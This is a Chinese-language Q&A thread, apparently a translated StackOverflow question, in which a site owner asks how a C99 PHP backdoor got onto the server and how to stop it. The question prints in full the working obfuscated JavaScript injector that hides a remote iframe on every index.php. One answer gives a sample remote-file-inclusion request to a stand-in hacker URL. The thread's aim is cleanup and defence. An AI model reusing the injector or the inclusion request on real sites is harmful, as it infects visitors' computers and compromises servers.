9

我的网站被木马脚本感染了。

有人设法创建/上传了一个名为“x76x09.php”或“config.php”的文件到我的网络空间的根目录中。它的大小为 44287 字节,其 MD5 校验和为 8dd76fc074b717fccfa30b86956992f8。我已经使用 Virustotal 分析了这个文件。这些结果表明它是“Backdoor/PHP.C99Shell”或“Trojan.Script.224490”。

该文件在创建的同时执行。所以它一定是自动发生的。该文件将以下恶意代码添加到我网站空间上每个 index.php 的末尾。

</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>

在我的页面上出现该代码后,用户报告说 Firefox 中弹出了一个蓝色面板。它要求他们安装一个插件。现在他们中的一些人在他们的 PC 上安装了 Exploit.Java.CVE-2010-0886.a。

尽管我关闭了 allow_url_fopen 和 allow_url_include,但感染确实发生了。我的托管人说该文件不是通过 FTP 上传的。

所以我的问题是:

  • 恶意代码有什么作用?它是如何编码的?
  • 远程文件(“x76x09.php”或“config.php”)如何进入我的网站?SQL注入?我自己的电脑上病毒?
  • 将来如何保护我的网站免受此类攻击?

非常感谢您!我真的需要帮助。

这个问题类似。但它更像是一份报告。我从一开始就不知道这是病毒。所以这里这个问题是指病毒本身,另一个问题不是。

4

3 回答 3

7

我们看到的许多被黑客入侵的网站都是 PC 上用于将文件 FTP 文件传输到受感染网站的病毒的结果。该病毒以多种方式窃取 FTP 密码,但主要是两种方式。

首先,如果您使用像 FileZilla 这样的免费 FTP 程序,您应该知道这些程序将保存的登录凭据存储在纯文本文件中。病毒很容易找到这些文件,读取它们并将信息发送到服务器,然后服务器使用有效凭据登录 FTP,将某些文件复制到自身,感染它们,然后将它们发送回网站。通常它还会将这些“后门”shell 脚本复制到网站,这样当 FTP 密码更改时,它们仍然可以重新感染网站。

该病毒还“嗅探”FTP 流量。由于 FTP 以纯文本形式传输包括用户名和密码在内的所有数据,因此病毒也很容易通过这种方式查看和窃取信息。

然而,很多时候,当我们看到导致感染的后门时,通常是站点某处的远程文件包含漏洞造成的。黑客不断尝试将指向其后门之一的 URL 添加到任何请求字符串的末尾。因此,在您的访问日志中,您可能会看到如下内容:

/路径/文件夹/另一个/文件夹/file.php?http://www.hackerswebsite.com/id.txt ????

这里的路径/文件夹字符串仅用于演示目的。

有时该命令有效,他们能够将 id.txt 复制到预期的网站,因此他们可以使用后门 shell 脚本来操作文件。

更改所有密码 - FTP、数据库、cPanel 或其他管理界面。

扫描所有 PC 以查找病毒。

更改为 SFTP。

检查所有文件夹的 755 权限和所有文件的 644。这是标准的。

如果是 SQL 注入,感染就不会出现在文件的末尾。它会在某个地方有一个 SQL 调用来生成内容。

是的。使用今天的后门,攻击者可以并且可能已经查看了保存 MySQL 数据的 config.php 文件。

更改所有密码。

于 2010-08-05T23:25:22.980 回答
6

您的网站已被利用代码入侵。

  1. 您必须更新所有内容,包括您可能已安装的任何 php 库。

  2. 运行phpsecinfo并通过修改您的 .htaccess 或 php.ini 来删除所有红色和尽可能多的黄色。

  3. 从您的 web 根目录 () 中删除所有文件和文件夹的写入权限,chmod 500 -R /var/www && chown www-root /var/wwwchown 应该是运行 php 的任何用户,因此请执行此操作<?php system('whoami');?>以弄清楚这一点。

  4. 更改所有密码,并尽可能使用 sftp 或 ftps。

  5. FILE从您的 php 应用程序使用的 MySQL 帐户中删除权限。

于 2010-08-04T22:39:47.623 回答
0

您的网站上可能有一个未正确过滤的上传机制。例如,如果您有能力使用个人资料图片,那么有人可以上传一个 php 文件并找到一种方法来执行它并获得对您网站的控制权。

x76x09.php 是一个未经审查的目录浏览器/上传器,它允许恶意上传器完全控制您的网站。

确保您立即暂时禁用所有将文件上传到服务器的方法,并删除所有文件中的所有恶意代码实例。

于 2010-08-04T22:22:10.580 回答